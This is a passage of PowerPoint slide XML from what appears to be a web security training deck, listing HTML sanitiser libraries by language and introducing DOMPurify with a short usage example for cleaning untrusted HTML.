                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>This is code from the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> project that was donated by Google. It is rather high performance and low memory utilization.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6798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4945"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>OWASP HTML Sanitizer Project</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00365A2A-CB9F-5842-B169-CA15FC8C7309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="734945"/>
            <a:ext cx="9144000" cy="5564254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1720399668"/>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
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>HTML sanitizers by language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1076749"/>
            <a:ext cx="8686800" cy="1131079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="18288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a:t>Pure JavaScript (client side)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>code.google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/p/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>google-caja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/wiki/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JsHtmlSanitizer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" spc="-30">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://code.google.com/p/google-caja/source/browse/trunk/src/com/google/caja/plugin/html-sanitizer.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="2" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/cure53/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2243881"/>
            <a:ext cx="8686800" cy="592470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="18288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b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pypi.python.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>pypi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/bleach</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2882777"/>
            <a:ext cx="8686800" cy="592470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="18288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b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://htmlpurifier.org/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3505027"/>
            <a:ext cx="8686800" cy="592470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="18288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b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.NET </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>github.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>mganss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HtmlSanitizer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4133648"/>
            <a:ext cx="8686800" cy="877163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="18288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b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ruby on Rails</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rubygems.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/gems/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>loofah</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>api.rubyonrails.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/classes/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5067070"/>
            <a:ext cx="8686800" cy="846386"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="18288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600" b="1">
                <a:solidFill>
                  <a:srgbClr val="DB3D16"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>index.php/OWASP_Java_HTML_Sanitizer_Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>JSoup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="968791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DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> : JavaScript Sanitizer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265056798"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> to Sanitize Untrusted HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1828800"/>
            <a:ext cx="8229600" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/cure53/DOMPurify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> works with a secure default, but offers a lot of configurability and hooks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Very simply to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Demo:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://cure53.de/purify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;div&gt;{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DOMPurify.sanitize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>myString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)}&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="928520108"/>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DOM XSS</a:t>
            </a:r>
